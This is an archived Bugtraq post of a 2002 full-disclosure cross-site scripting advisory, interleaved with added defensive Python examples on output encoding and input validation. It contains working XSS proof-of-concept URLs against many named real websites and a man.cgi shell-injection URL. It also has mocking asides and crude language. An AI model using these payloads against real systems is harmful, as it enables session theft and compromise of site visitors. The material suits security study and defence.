GOBBLES SECURITY ADVISORY #33

From: Dave Ahmad (daat_private)
Date: Fri May 10 2002 - 11:44:48 PDT


    What follows is GOBBLES advisory #33.  The original version was inappropriate for
    the list (http://online.securityfocus.com/popups/forums/bugtraq/faq.shtml#0.1.3).
    
    With the permission of GOBBLES, an edited advisory is now being sent out.
    
    The original, unedited version is located at:
    
    http://www.bugtraq.org/advisories/GOBBLES-33.txt
    
    ---
    
    Hi,
    
    We saw the Administrivia post today, so we decided to send this in. Hopefully
    it's not too late.
    
    The post mentioned that new forms of cross-site scripting attacks would be
    accepted. Well, as you'll see, we have some nifty tricks that are discussed,
    and also some major products are totally torn apart.
    
    Most of the sites allow you to download their custom scripts (e.g. man.cgi) so
    we believe we are justified in giving examples of sites that are affected,
    especially since this has been the norm on the security lists for a while now.
    
    Thanks to all the administrators who were good sports over this.
    
    GOBBLES SECURITY
    http://www.bugtraq.org/
    GOBBLESat_private
    
    GOBBLES SECURITY ADVISORY #33
    
    Compass, Square, and Slide-rule
    New Generation CSS
    
    
    ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT!
    ############################################################################
    #                                                                          #
    #  CROSS-SITE SCRIPTING VULNERABILITIES IN PROMINENT WEBSITES AND PRODUCTS #
    #                                                                          #
    #                                                                          #
    ############################################################################
    ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT! ALERT!
    
    
    I'm over it
    You see I'm falling in the fast abyss
    Clouded by memories of the past
    At last I see
    
    I hear it fading, I can't speak it
    Oh yes you will dig my grave
    You feeling, finding, always whining
    Take my hand now be alive
    
    You see I cannot be forsaken
    Because I'm not the only one
    We walk amongst you feeding, raping
    Must we hide from everyone?
    
    
    
    Before we begin, we'd like to mention that recently we've been overwhelmed
    with emails from journalists asking us questions about our security group.
    GOBBLES like this very much because it is sign of his crew becoming very
    famous and ubiquitous. We be accused of seeking fame and job offers. To this
    GOBBLES say no, we not after job offers, but yes, we after as much fame and
    attention as possible and this is why we will be disclosing more serious
    remote vulnerabilities in OS like Solaris and IRIX in near future. Remote
    exploit for IRIX can then be complemented with upcoming GOBBLES IRIX
    backdoor.
    
    Current misinterpretation about what GOBBLES mean when he say he group
    seeking worldwide fame, mostly stem from belief that GOBBLES is supporter of
    non-disclosure and is being sarcastic. This is wrong, disclosure of
    rpc.rwalld hole show GOBBLES not supporter of non-disclosure and current
    development project 'lestat' for another default RPC service in Solaris is
    leading to further proof that GOBBLES is avid supporter of full-disclosure,
    especially because it great way to annoy as many Fascists, Communists, and
    McCarthys as possible ;PPPPPPPPPPP. But GOBBLES primary motivation is
    becoming as famous as possible.
    
    We now co-existing with Bugtraq, making the peace, being ethical, etc.
    
    BACKGROUND
    ==========
    
    Been a lot of fanfare about cross-site scripting in recent times. Person
    suggest changing acronym from CSS to XSS so it different from Cascading
    Style Sheets, but this not really good move because XSS conflict with XML
    Security Suite from IBM (they company who make computer systems, probably
    not big fans of stem cell research HEHEHEHEHEHEHEHE).
    
    When GOBBLES Security first dreamed of the CSS technique, pioneered it,
    refined it, and perfected it, we knew of the dastardly tool of mass
    destruction that had just materialized. Here was something that could make
    Joe Average a security expert, something that could be wielded by the little
    guy to sting and subdue the domineering commercial bullies. A well-planted
    CSS attack can undermine the reputation of even the most stringent
    corporations, thus making it one of the most effective political tools known
    in cyberspace. It truly is the Queen's Gambit, the Power Set, the Homology
    Group, and the Achilles Heel of the infosec world.
    
    
    INNOVATIVE CSS TECHNIQUES
    =========================
    
    * JavaScript entities
    ---------------------
    
    Only hotmail security historians like those at GOBBLES Security know of
    obscure feature in JavaScript language that make it easy to bypass thing
    like "<...>", "<script>...</script>", and "javascript:" filter for CSS
    attack using JavaScript. That is thing called JavaScript entity. Like...
    
    &{alert('GOBBLES')};
    
    When url-encoded become...
    
    %26%7balert%28%27GOBBLES%27%29%7d%3b
    
    The beauty of this technique for the adorned CSS exploiter is that the
    GOBBLES CSS JavaScript Entity can appear almost anywhere with good results.
    
    Note that "CERT" page below make no mention of this at all and even say that
    ampersand is not relied upon by current exploits. Well, now it is.
    
    http://www.cert.org/tech_tips/malicious_code_mitigation.html
    
    For reference, HTML4 specification only require you to encode the following:
    
    ;       %3b
    /       %2f
    ?       %3f
    :       %3a
    @       %40
    =       %3d
    &       %26
    <       %3c
    >       %3e
    "       %22
    #       %23
    %       %25
    {       %7b
    }       %7d
    |       %7c
    \       %5c
    ^       %5e
    ~       %7e
    [       %5b
    ]       %5d
    `       %60
    
    Until now, that encoding information was private knowledge of the
    underground. GOBBLES is about information dissemination and believe
    information wants to be free, though. So really GOBBLES see no need why he
    should have to justify the disclosure of the encoding techniques. If GOBBLES
    didn't do it, someone would have, and it best this come from a whitehat
    retard than from someone making the big dollar.
    
    Sometimes in URLs below we can't encode parameter, but this no problem for
    GOBBLES because smart thing to do is just not enter the character encoded,
    i.e. enter it literally with no %XX, e.g. '>' gets entered as '>', i.e. '>'
    does not get entered as '%3e'. Why? Because sometimes in URLs below we can't
    encode parameter.
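Added example (not part of the advisory, and not code from any site or product it names): a short Python script showing why a tag/scheme blocklist of the kind described above lets the entity form through, and why attribute-context output encoding does not. The blocklist, the <INPUT> renderer and the function names are constructed for the example; the payload and its percent-encoded form are the two strings quoted above. JavaScript entities were a Netscape-era feature, so the lasting point for a defender is the encoding rule rather than that one syntax: if '&' is always emitted as '&amp;' inside attribute values, no entity of any kind can be assembled from user data, and the percent-encoding table above is simply what unquote() reverses on the server side.

```python
import html
from urllib.parse import quote, unquote

# Constructed sample values: the entity payload quoted in the advisory,
# as typed and as it travels inside a URL.
ENTITY_PAYLOAD = "&{alert('GOBBLES')};"
ENTITY_ENCODED = "%26%7balert%28%27GOBBLES%27%29%7d%3b"

# Hypothetical blocklist of the kind the advisory describes being bypassed:
# it knows about angle brackets, <script> and the javascript: scheme only.
BLOCKED_TOKENS = ("<script", "</script", "javascript:", "<", ">")


def blocklist_filter(value: str) -> str:
    """Remove each blocked token. Anything the list does not name (such as
    '&{', '}' and ';') passes through untouched."""
    out = value
    for token in BLOCKED_TOKENS:
        out = out.replace(token, "")
    return out


def attribute_escape(value: str) -> str:
    """Output encoding for an HTML attribute value. '&' becomes '&amp;', so
    the sequence '&{...};' can no longer be read as an entity of any kind,
    and quotes become '&quot;' / '&#x27;', so the value cannot end the
    attribute early."""
    return html.escape(value, quote=True)


def render_input(value: str, encoder) -> str:
    """Emit the <INPUT> tag shown in the advisory with the given encoder
    applied to the reflected query value."""
    return '<INPUT VALUE="%s" NAME="query">' % encoder(value)


def decode_query_value(encoded: str) -> str:
    """Percent-decode a query value the way a CGI script does; every %XX in
    the advisory's table is undone here."""
    return unquote(encoded)


def encode_query_value(value: str) -> str:
    """Percent-encode everything except unreserved characters (safe='')."""
    return quote(value, safe="")


if __name__ == "__main__":
    reflected = decode_query_value(ENTITY_ENCODED)
    print("blocklist:", render_input(reflected, blocklist_filter))
    print("escaped  :", render_input(reflected, attribute_escape))
```

The blocklist returns the reflected value unchanged, so the rendered tag is byte-for-byte the vulnerable <INPUT> line shown further down for man.cgi; the escaped version contains no '&{' at all. Encoding by output context, not filtering by input pattern, is the check that generalizes.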
    
    
    * HTML string completion / HTML closure
    ---------------------------------------
    
    Principles are basically identical to SQL injection technique. Doesn't need
    much coverage since it pretty obvious to anyone with rational mind. GOBBLES
    will let "CERT" write a dissertation on it. Essentially...
    
    *** HTML string completion:
    
    <a href="[...]$user_provided">
    
    Make $user_provided: " attribute="malicious_data
    
    Then original text becomes
    
    <a href="[...]" attribute="malicious data">
    
    Good to make 'attribute' event handlers like onMouseOver, onLoad, onClick,
    etc. But can just use common attribute like 'id' and just insert GOBBLES CSS
    JavaScript Entity.
    
    *** HTML closure:
    
    <a href="[...]$user_provided">
    
    Make $user_provided: "> <tag attribute="malicious data">
    
    Then original text becomes
    
    <a href="[...]"> <tag attribute="malicious data">">
    
    Good way to introduce <script> tag, etc. Or GOBBLES CSS JavaScript Entity
    can be inserted.
    
    Again, these two are blatantly obvious and probably have many appearance on
    the Vuln-Dev already. GOBBLES CSS JavaScript Entity Technique make them
    almost obsolete.
    
    
    THE VULNERABILITIES
    ===================
    
    
    1. openbsd.org / man.cgi
    ------------------------
    
    You can get source code like so:
    
    http://www.openbsd.org/cgi-bin/man.cgi/source
    
    Should be noted that up until a few months ago, '/usr/include' processing
    was vulnerable to simple PERL open() attack.
    
    sub include_output {
        local($inc) = @_;

        &http_header("text/plain");
        # Two-argument open(): the mode is taken from the caller-controlled
        # string itself, so $inc is not treated as a plain filename.
        open(I, "$inc") || do { print "open $inc: $!\n"; exit(1) };
        while(<I>) { print }
        close(I);
    }
    
    So you could do like...
    
    http://www.openbsd.org/cgi-bin/man.cgi/usr/include;IFS=G;unameG-a;|
    
    ... work your way up to local access and core the box with your Solaris
    locals. Then they try thing like -T taint switch, removing /bin/sh, etc. but
    futile attempt since existence of GOBBLESpserver-ex.c that will be disclosed
    soon (hehehe, Theo, I HATE YOU!).
    
    We mention this in case other people using version of man.cgi from their
    site from a while ago.
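Added example, not code from man.cgi or from OpenBSD: a Python counterpart of include_output that confines the requested name to one directory and opens the file by name only, so the request string never reaches a shell and '..' cannot leave the tree. The directory layout is constructed inline for the demo and the tests; the function names and the sample root are assumptions, and the rejected path component is the one from the URL above.

```python
import tempfile
from pathlib import Path
from typing import Optional


def make_sample_root() -> Path:
    """Build a throwaway tree (constructed sample data): one header under
    'include/' and one file outside it that must never be served."""
    base = Path(tempfile.mkdtemp(prefix="include_demo_"))
    root = base / "include"
    root.mkdir()
    (root / "stdio.h").write_text("/* sample header */\n")
    (base / "secret.txt").write_text("not for the web\n")
    return root


# Stand-in for /usr/include in the demo and the tests.
SAMPLE_ROOT = make_sample_root()


def resolve_include(requested: str, root: Path = SAMPLE_ROOT) -> Optional[Path]:
    """Map the path component from the URL onto a regular file under root,
    or return None. Leading slashes are stripped so an absolute path cannot
    replace the root; the containment test runs on the resolved path, so
    '..' segments and symlinks cannot escape; and because the file is later
    opened by name (never through a shell), ';', 'IFS=' or a trailing '|'
    are just characters that fail to name an existing file."""
    base = root.resolve()
    candidate = (base / requested.lstrip("/")).resolve()
    try:
        candidate.relative_to(base)
    except ValueError:
        return None
    if not candidate.is_file():
        return None
    return candidate


def include_output(requested: str, root: Path = SAMPLE_ROOT) -> str:
    """Return the file's text, or raise. The caller sends it as text/plain,
    as the original does, so the body is not interpreted as HTML."""
    path = resolve_include(requested, root)
    if path is None:
        raise FileNotFoundError(requested)
    return path.read_text(errors="replace")


if __name__ == "__main__":
    for name in ("stdio.h", "../secret.txt", ";IFS=G;unameG-a;|"):
        print(repr(name), "->", resolve_include(name))
```

Taint mode and removing /bin/sh, the measures the text mentions, treat the symptom; the fix that holds is to never hand a request string to an API that may interpret it, and to validate the resolved path against the directory being exposed.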
    
    OK, for CSS hole, just a simple matter of linking to...
    
    http://www.openbsd.org/cgi-bin/man.cgi?query=%26%7balert%28%27GOBBLES%27%29%7d%3b&apropos=hehehe
    
    Examine HTML source to see how GOBBLES CSS JavaScript Entity Technique bypasses
    the most anal filtering, even when "javascript:..." not always appropriate
    and automatic JavaScript event handlers don't apply.
    
    <INPUT VALUE="&{alert('GOBBLES')};" NAME="query">
    
    Shouldn't be too hard to think of how malicious website owner can use this
    for CSS attacks against visitor web browser that implicitly trusts
    openbsd.org -- and who wouldn't since it the cornerstone of security?
    
    
    2. happyhacker.org / thttpd webserver proper / thttpd ssi program
    -----------------------------------------------------------------
    
    The default 404 handling of the thttpd webserver is vulnerable to CSS
    attacks. All you have to do is....
    
    http://thttpd-site/>alert('GOBBLES');</script>/
    
    OR
    
    http://thttpd-site/cgi-bin/ssi/>alert('GOBBLES');</script>/
    
    Note that it doesn't decode url-encoding, you may have mixed results using
    spacing in the URL, and the default <script> language for Netscape (at
    least) is JavaScript.
    
    Examples:
    
    http://www.happyhacker.org/>alert('GOBBLES');</script>/
    http://www.happyhacker.org/cgi-bin/ssi/%3cp+align%3D%26%7balert%28%27GOBBLES%27%29%7d%3b%3e
    
    Both were tested against the latest stable version of thttpd from...
    
    http://www.acme.com/software/thttpd/thttpd-2.20c.tar.gz
    
    ... so this time the developer can't downplay the findings of the GOBBLES
    Security Research Organization like he did with our theoretically
    exploitable off-by-one, nor can he invent fake CHANGELOG entries (google
    cache catch you out there my friend).
    
    
    3. thievco.com / Matt Wright's guestbook script
    -----------------------------------------------
    
    GOBBLES regularly visit The Blue Boar's website in search of hacking
    information, so it incumbent upon GOBBLES to alert world to presence of
    cross-site scripting hole in The Blue Boar's website and, more importantly,
    in Matt Wright's guestbook script.
    
    Matt Wright's guestbook script can be found at:
    
    http://worldwidemart.com/scripts/guestbook.shtml
    
    To he credit, he has $allow_html variable that can strip "<...>" stuff, but
    once again, GOBBLES trademarked JavaScript Entity CSS Technique come to the
    rescue. Incidentally, The Blue Boar allows html in his guestbook fields, but
    as we just said, the presence of this does not determine whether or not we
    can use our CSS technique. We always can.
    
    if ($FORM{'url'}) {
        print GUEST "<a href=\"$FORM{'url'}\">$FORM{'realname'}</a>";
    }
    
    You see, even if html form do not have 'url' parameter, remote attacker can
    still create their own local html form pointing at The Blue Boar's website
    or some other site with Matt Wright's guestbook script. This permits them to
    inject malicious data via 'url' parameter that will allow CSS attacks on
    anyone viewing the guestbook.
    
    Script can only be called with POST method, so it can't be linked to, but
    this is moot point because with permanent malicious CSS data in actual
    guestbook, attacker can just drop it there and leave, knowing that if site
    store authentication information in cookies or whatever, anyone viewing
    guestbook with JavaScript enabled will be slain by malicious code in
    attacker guestbook entry.
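Added example, not the guestbook's code and not from the advisory: a Python rendering of the print statement above, once vulnerable and once hardened. It covers the "HTML string completion" and "HTML closure" shapes from the techniques section as well as the guestbook case, because all three come down to the same rendering mistake. The two payload strings are the ones from those sections; the function names and the placeholder host are assumptions.

```python
import html
from typing import Optional
from urllib.parse import urlsplit

# Constructed sample inputs: the two payload shapes from the "HTML string
# completion" and "HTML closure" sections, and a benign URL with a
# placeholder host.
COMPLETION_PAYLOAD = '" attribute="malicious_data'
CLOSURE_PAYLOAD = '"> <tag attribute="malicious data">'
BENIGN_URL = "http://example.com/"

ALLOWED_SCHEMES = ("http", "https")


def render_link_unsafe(url: str, realname: str) -> str:
    """Python counterpart of the guestbook's print statement: both values
    are interpolated verbatim, so a quote inside 'url' ends the href
    attribute and the rest of the value is parsed as markup."""
    return '<a href="%s">%s</a>' % (url, realname)


def attribute_value(value: str) -> str:
    """Encode a string for use inside a double-quoted attribute value."""
    return html.escape(value, quote=True)


def validate_url(url: str) -> Optional[str]:
    """Accept only absolute http(s) URLs with a host. This is needed on top
    of escaping: a correctly quoted href="javascript:..." is still script.
    The check must live on the server, since an attacker submits any field
    from a form of their own regardless of what the site's page contains."""
    candidate = url.strip()
    parts = urlsplit(candidate)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.netloc:
        return None
    return candidate


def render_link_safe(url: str, realname: str) -> str:
    """Escape each value for the context it lands in, and drop the link
    when the URL fails validation (the name is still shown as text)."""
    name = html.escape(realname, quote=True)
    checked = validate_url(url)
    if checked is None:
        return name
    return '<a href="%s">%s</a>' % (attribute_value(checked), name)


if __name__ == "__main__":
    for payload in (COMPLETION_PAYLOAD, CLOSURE_PAYLOAD, BENIGN_URL):
        print("unsafe:", render_link_unsafe(payload, "visitor"))
        print("safe  :", render_link_safe(payload, "visitor"))
```

The unsafe renderer reproduces exactly the broken markup shown in the techniques section; attribute_value() alone already leaves both payloads inert, and validate_url() closes the remaining gap where a syntactically clean href carries a script scheme. Because the entry is stored and re-rendered for every later visitor, the encoding has to happen at output time, whatever the site's own form allows.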
    
    This is obviously a very devastating vulnerability. CSS hole are sometimes
    overlooked, but luckily in this world there are security masterminds with a
    razor sharp logic -- they miss nothing. These masterminds are your only
    salvation. Without their marvellous creativity and insight, the Internet
    would be a very scary place indeed.
    
    Hereeeeeeeeeeeeeeeeeeeeeee's Johnnnnnnnnnnnnnnnnnnnnnnnnnyyyyyyyyyyyyyy!
    
    
    4. antionline.com / fatelabs.com / vbulletin php package
    --------------------------------------------------------
    
    There are tons of bugs in the latest version of this package. It's
    commercial, so you can only download a Lite version, but GOBBLES have a
    network of contacts in the warez scene and was able to obtain both the
    version 2.0.3 that Antionline is built on and the latest version.
    
    Antionline switched from PERL to PHP last year.
    GOBBLES have script that can ethically hack John Vranesevich's site in 5-10
    seconds.
    
    Only interested in CSS bugs here, though.
    
    The bug is like vbulletin cross-site scripting hole revealed here:
    
    http://online.securityfocus.com/archive/1/263609/2002-05-01/2002-05-07/0
    
    But big difference is that GOBBLES CSS JavaScript Entity Technique and the
    other techniques mentioned above make many, many, many more portions of the
    code vulnerable.
    
    Examples:
    
    http://www.antionline.com/mod/index.php?redirect=&{alert('GOBBLES')};
    http://forums.fatelabs.com/mod/index.php?redirect=&{alert('GOBBLES')};
    
    Looking at HTML source show how GOBBLES CSS Javascript Entity can appear
    anywhere in attribute value, which make it very flexible.
    
    <input type="hidden" name="redirect"
    value="/mod/index.php?redirect=&{alert('GOBBLES')};&[...]
    
    FateLabs uses version 2.0.0 of this script which is just as vulnerable to
    remote command execution.
    
    
    5. cern.ch
    ----------
    
    http://consult.cern.ch/xwho/people/>alert('GOBBLES');</script>
    http://consult.cern.ch/xwho/people/%3cp+align%3D%26%7balert%28%27GOBBLES%27%29%7d%3b%3e
    
    Hacking is bad, you butt pirate.
    
    
    6. cansecwest.com
    -----------------
    
    http://www.cansecwest.com/register.cgi?Name=%26%7Balert%28%27GOBBLES%27%29%7D%3B&Addr1=G&City=G&State=G&Country=G&Zip=G&Email=G%40G.G&Phone=G&rm=mode3&session=729%3A601e5c2e26fa3c87e656ef1b484f8fc3
    
    Session ID may be problem here.
    
    
    7. sans.org / incidents.org / discus pro / htdig's htsearch
    -----------------------------------------------------------
    
    http://forum.sans.org/cgi-bin/discus/board-profile.cgi?action=%3cp+align%3d%26%7balert%28%27GOBBLES%27%29%7d%3b%3e
    
    http://forum.sans.org/cgi-bin/discus/board-search.cgi?query=%3cp+align%3d%26%7balert%28%27GOBBLES%27%29%7d%3b (notice no trailing '>')
    
    This is a commercial package, so we unable to do a full audit and narrow
    down all problems in source, but GOBBLES team was able to bust 7 different
    cross-site scripting attacks using sans.org cgi scripts in 10 minutes of
    searching. GOBBLES expect that the forum itself will be heavily vulnerable
    to CSS attack, and this very dangerous for sans.org because of way in which
    they interact with their visitor member.
    
    Both sans.org and incidents.org use htdig htsearch program. We know of one
    CSS attack in this (probably many more), but since revelation of CSS hole
    also give revelation of buffer overflow in C++ code, GOBBLES think it best
    to leave that for future advisory all on its own. Hehehehehehe, give GOBBLES
    time to write up remote brute forcing exploit again and wait for l0pht.com
    to return with their htdig hehehehe J/K! :PPPPPPPPPPPPPPPPPPPPPPPP. This
    hint for developer to look at code.
    
    
    8. 2600.com
    -----------
    
    http://www.2600.com/cgi-bin/covers.pl?issue=%26%7balert%28%27GOBBLES%27%29%7d%3b
    
    in this day and age of security, especially with the fast pace that GOBBLES
    sets as a standard. Gone are the days of password brute forcing, phf
    attacks, and how2knowifyouhavefoundyournewageethicalhacker.
    
    HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC
    BBS Y0 BACK IN THE OLD SCHOOL DAYZ RPGS FIELD PHREAKING BACKPACKZ B00ZE
    HACKING         WANTED FOR UPCOMING 2600 MEETINGS                HACKING
    PHREAKING       *********************************               PHREAKING
    VIRII           m0r3 buckt00th sn0tty-n0s3d 4cn3                   VIRII
    ANARCHY                 f4ct0ry f@s0z                            ANARCHY
    CRACKING/CARDING                                        CRACKING/CARDING
    TELCO MANUALZ RADIOSHACK BACKYARD DRUG LABZ GFX CARDZ SERIAL PORT KRAYZEE
    HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC HPVAC
    
    
    9. snort.org
    ------------
    
    http://www.snort.org/external/?url=javascript:%22+onMouseOver%3d%22alert('GOBBLES')%3b
    
    Also, GOBBLES has discovered a Cross-Cross-Site Scripting (CCSS)(tm) class
    of holes while researching the snort.org Cross-Site Scripting vulnerability.
    This permit attacker to do like...
    
    http://www.snort.org/external/?url=http://somesite/index.php?malicious_data
    
    You see, sometimes thing like index.php will return QUERY_STRING in
    displayed page.
    
    Shouldn't be too hard to imagine the transitive nature of this attack -- we
    have CSS, CCSS, CCCSS, CCCCSS, CCCCCSS, ..., C^nSS.
    
    bash-2.05a$ SERIES="CSS";while true;do echo $SERIES;SERIES="C$SERIES";done
    
    So if attacker can make site A cause CSS on site B and attacker can make
    site B cause CSS on site C, then attacker can make site A cause CSS on site
    C. This is hypothetical syllogism.
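Added example, not snort.org's code: a Python check for a redirector of the "/external/?url=" kind, which is where both the reflected "javascript:" case and the transitive C^nSS chain begin. The host allowlist and the function names are assumptions; the two rejected inputs are the url= arguments quoted above.

```python
from typing import Optional, Tuple
from urllib.parse import urlsplit

# Hypothetical allowlist for the redirector (placeholder hosts).
ALLOWED_HOSTS = {"www.example.org", "docs.example.org"}


def safe_redirect_target(url: str) -> Optional[str]:
    """Return url only if it is an absolute http(s) URL whose host is on the
    allowlist. The scheme test rejects 'javascript:' and similar; the host
    test is what breaks the chain A -> B -> C: a redirector that forwards
    only to hosts it vouches for cannot be used to reach a third site that
    echoes its query string, however many hops are stacked."""
    candidate = url.strip()
    parts = urlsplit(candidate)
    if parts.scheme.lower() not in ("http", "https"):
        return None
    host = (parts.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        return None
    return candidate


def redirect_response(url: str, fallback: str = "/") -> Tuple[int, str]:
    """Status and Location a handler would emit: the allowed target, or the
    site's own fallback page when the target is rejected. The rejected
    value is never echoed into the response body."""
    target = safe_redirect_target(url)
    return 302, (fallback if target is None else target)


if __name__ == "__main__":
    for u in ("https://www.example.org/start",
              "javascript:\" onMouseOver=\"alert('GOBBLES');",
              "http://somesite/index.php?malicious_data"):
        print(repr(u), "->", redirect_response(u))
```

The host comparison uses the parsed hostname rather than a substring match, so a lookalike such as www.example.org.evil.test is refused as well; that is the check that an allowlist built with startswith() or "in" would miss.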
    
    
    10. takedown.com / modified Matt Wright's guestbook script
    ----------------------------------------------------------
    
    Same technique is used as for The Blue Boar's site. Hehehehe, you even see
    where GOBBLES left Shimmy a message here:
    
    http://www.takedown.com/guestbook/guestbook.html
    
    But that not all! Hehehe, there more CGI fun on Shimomura's site that he
    created for defamation remission, but GOBBLES will let you find it hehe. It
    OK Tsutomu, GOBBLES still think you elite hehehehehehehehe ;>>>>>>. GOBBLES
    know all the techniques: crazy monkey, sendmail, bind!
    
    11. nessus.org / freebsd.org / cvsweb
    -------------------------------------
    
    http://cgi.nessus.org/cgi-bin/cvsweb.cgi/%3cp+align%3D%26%7balert%28%27GOBBLES%27%29%7d%3b%3e
    
    http://www.freebsd.org/cgi/cvsweb.cgi/%3cp+align%3D%26%7balert%28%27GOBBLES%27%29%7d%3b%3e
    
    Hehehe, and a Theo bonus:
    
    http://www.openbsd.org/cgi-bin/cvsweb/%3cp+align%3D%26%7balert%28%27GOBBLES%27%29%7d%3b%3e
    
    
    12. owasp.org
    -------------
    
    http://owasp.org/%3cp+align%3D%26%7balert%28%27GOBBLES%27%29%7d%3b%3e
    
    These guys like to write all about web security, including cross-site
    scripting attacks. You can read about it here:
    
    http://www.owasp.org/asac/input_validation/css.shtml
    
    
    13. whitehats.com
    -----------------
    
    http://www.whitehats.com/cgi/arachNIDS/Search?search=&{alert('GOBBLES')};
    
    That just an example of dozens of CSS holes found on the whitehats website
    in different scripts, including the forums.
    When he get out we will send him email informing him of all the CSS and
    command execution bugs GOBBLES found on his website. GOBBLES appreciate work
    of Max Vision in the community; we make heavy use of his BIND9 fingerprint
    techniques and he keep a great database of signatures for snort that let us
    know when we've been owned.
    
    14. ciac.org / nfr.com / webglimpse
    -----------------------------------
    
    From ciac:
    
    http://www.ciac.org/cgi-bin/webglimpse/www/htdocs/ciac/archive?query=%3cp+align%3D%26%7balert%28%27GOBBLES%27%29%7d%3b%3e
    
    http://hoaxbusters.ciac.org/cgi-bin/webglimpse-hoaxbusters/www/hoaxbusters/archive?query=%3cp+align%3D%26%7balert%28%27GOBBLES%27%29%7d%3b%3e
    
    From nfr:
    
    http://www.nfr.com/cgi-bin/nfrsearch?query=hehehe&id=2&whole=%26%7balert%28%27GOBBLES%27%29%7d%3b
    
    
    15. cerias.purdue.edu
    ---------------------
    
    http://www.cerias.purdue.edu/search/results.php?search=%3cp+align%3D%26%7balert%28document.location%29%7d%3b%3e
    
    This script strip the single quotes, but any web puppy can get around this.
    TEAM GOBBLES in a hurry to meet closing Bugtraq CSS deadline so we couldn't
    check all scripts on this site, but because we fans of this site, we sent
    administrator an email pointing out the problems and telling him where he
    can find further information:
    
    "pp. 544-547 of book _Practical Unix & Internet Security_ describe CGI
    weakness in detail and you well-advised to purchase a copy of this book.
    GOBBLES have this book on he shelf and wouldn't be what he is today if he
    didn't read this amazing piece of literary accomplishment."
    
    
    16. infowar.com
    ---------------
    
    http://www.infowar.com/search/search_results.cfm?term1=<script>alert('GOBBLES');</script>
    
    There also several remote command execution vuln on Winny site. He been
    notified.
    
    
    17. grc.com
    -----------
    
    http://grc.com/x/ne.dll?>alert('GOBBLES');</script>
    
    
    
    18. acm.org
    -----------
    
    http://campus.acm.org/public/search/results.cfm?query=%3C%2Ftextarea%3E%3Cp+align%3D%26%7Balert%28%27GOBBLES%27%29%7D%3B
    
    This good example of HTML closure technique, i.e. using </textarea> to break
    out of one opened already and then busting cross-site scripting move in
    regular fashion.
    
    
    19. security.nnov.ru
    --------------------
    
    http://security.nnov.ru/search/exploits.asp?keyword=&{alert('GOBBLES')};
    
    GOBBLES certain he found this one before 3APA[...]A hehehehehe ;).
    
    
    20. sun.com
    -----------
    
    http://sunsolve.sun.com/pub-cgi/show.pl?target=%26%7balert%28%27GOBBLES%27%29%7d%3b
    
    Hehehehehe, 2+ default RPC remote root vulns coming to Bugtraq *VERY* soon.
    GOBBLES will be making the exploits very easy to use this time, because we
    had a lot of emails concerning rpc.rwalld from HotBabe, LinuxGal, etc.
    saying rpc.rwalld impossible to use.
    
    
    FINAL WORDS
    ===========
    
    We have ethically disclosed CSS holes in a number of sites by co-existing
    with Bugtraq and spreading the full-disclosure faith. We have also shared a
    few nuggets of information with the community we love. Because of the
    relatively low risk of the attack -- to say the least -- GOBBLES didn't find
    it necessary to inform all of the administrators. And in certain respects,
    GOBBLES think it really makes little difference to the security of the above
    sites anyway...
    
    Remember: all of the above sites are UNSAFE TO VISIT from untrusted
    websites, and some are even unsafe to visit directly with scripting enabled
    in your browser.
    
    There are many self-proclaimed CSS experts out there who will litter your
    inbox with their daily CSS discoveries, but there can only be one CSS king,
    and that king is GOBBLES. Don't accept any imitations.
    
    Sleep well, my friends.
    



    This archive was generated by hypermail 2b30 : Fri May 10 2002 - 19:01:01 PDT